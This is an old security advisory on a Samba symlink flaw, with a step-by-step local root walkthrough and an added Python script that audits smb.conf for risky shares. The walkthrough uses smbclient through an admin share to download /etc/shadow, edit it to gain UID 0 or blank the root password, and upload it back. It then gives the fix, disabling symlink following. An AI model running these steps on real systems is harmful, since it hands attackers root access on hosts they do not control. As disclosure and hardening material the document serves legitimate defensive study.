Title: Symlink attack in (all?) Samba
Released by: Tozz
Date: 14th December 2000
Symlink attack in (all?) Samba. - Local root walkthrough by Tozz

=================================================================

Requirements:

* Shell access or any other way to create symlinks
* A running Samba daemon
* The username and/or password of a user named in the
  'admin users' list of one or more shares.
* Brains are not required.

By default, Samba (http://www.samba.org) follows symlinks, which can lead to
a root compromise. Here is an example:

I have a guy that sorts out all my uploads through SMB; he has 'admin'
access (admin users = username). This means he will work as UID 0 (root).

e.g. we have this share in /etc/smb.conf:

[uploads]
 path = /home/ftp/incoming
 comment = Uploads that came through anon ftp
 guest ok = no
 writeable = no
 force create mode = 0755
 force directory mode = 0755
 admin users = warezmaster

Login to the shell, or find some other way to create symlinks,
and create a symlink in /home/ftp/incoming. You do something like

ln /etc -s

Now type on your box (local or remote both work):

smbclient //foobar.com/uploads -U warezmaster

It will ask for a password; enter it and you will get something like

smb: \>

There we go:

smb: \> cd etc
smb: \> get shadow
smb: \> exit

[root@embrace /root]

Now you have downloaded the shadow file to your local box.
Edit it: change your UID to 0, or remove the password
from the root account (no password required at logon).

Login with smbclient again:

smbclient //foobar.com/uploads -U warezmaster

enter the password, and re-upload:

smb: \> cd etc
smb: \> put shadow
smb: \> exit

That's it. Now login to the shell: if you changed your own UID
you are now root. If you removed the password from the root account,
just su to it and you won't need a password.

Note:

The 'follow symlinks' option can be turned off, but it is on by default.

Fix:

Disable Follow Symlinks
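The fix above is a single per-share setting that defaults to on, so the risky combination is easy to miss in a long smb.conf. The script below is an added audit example (not the author's code): it reads an smb.conf in the style of the [uploads] share above and flags every share where 'admin users' is set while 'follow symlinks' is still at its default of yes. The sample configuration is constructed for the example.

```python
# Constructed sample smb.conf: the advisory's [uploads] share next to a share
# hardened with 'follow symlinks = no'. Samba follows symlinks unless told not to.
SAMPLE_SMB_CONF = """\
[global]
 workgroup = WORKGROUP

[uploads]
 path = /home/ftp/incoming
 writeable = no
 admin users = warezmaster

[hardened]
 path = /srv/hardened
 admin users = backupop
 follow symlinks = no
"""

def parse_smb_conf(text):
    """smb.conf -> {section: {key: value}}; Samba ignores case/whitespace in keys."""
    shares, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank or comment line
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            shares[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            shares[current]["".join(key.lower().split())] = value.strip()
    return shares

def setting(shares, share, key, default):
    """Share-level value, else the [global] value, else Samba's built-in default."""
    for section in (share, "global"):
        if key in shares.get(section, {}):
            return shares[section][key]
    return default

def risky_shares(text):
    """Shares where a UID-0 'admin users' entry meets symlink following."""
    shares = parse_smb_conf(text)
    return [name for name in shares
            if name != "global"
            and setting(shares, name, "adminusers", "")
            and setting(shares, name, "followsymlinks", "yes").lower() in ("yes", "true", "1")]

if __name__ == "__main__":
    for name in risky_shares(SAMPLE_SMB_CONF):
        print(f"[{name}]: 'admin users' set while 'follow symlinks' is on")
```

Run it against a real /etc/smb.conf by passing the file contents to risky_shares(); a share named in the output needs 'follow symlinks = no' or its 'admin users' entry removed.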
Bye,
Tozz (tozz@hackers4hackers.org)

You can contact me on AxeNet (irc.axenet.org, channel #axenet), nickname Tozz,
or MemoServ me when I'm not online.